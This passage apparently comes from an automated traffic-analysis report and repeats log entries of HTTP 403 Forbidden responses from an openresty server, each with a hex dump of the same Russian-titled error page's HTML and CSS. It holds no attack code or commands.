61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:02:37 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:02:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:02:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:02:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:03:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:03:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 